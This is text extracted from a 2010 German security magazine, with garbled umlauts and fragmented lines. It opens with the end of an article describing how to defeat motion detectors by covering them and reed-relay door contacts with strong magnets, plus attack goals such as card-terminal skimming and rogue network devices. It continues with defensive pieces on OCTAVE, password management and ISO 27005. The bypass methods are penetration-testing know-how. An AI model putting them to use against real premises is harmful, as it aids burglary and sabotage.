beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
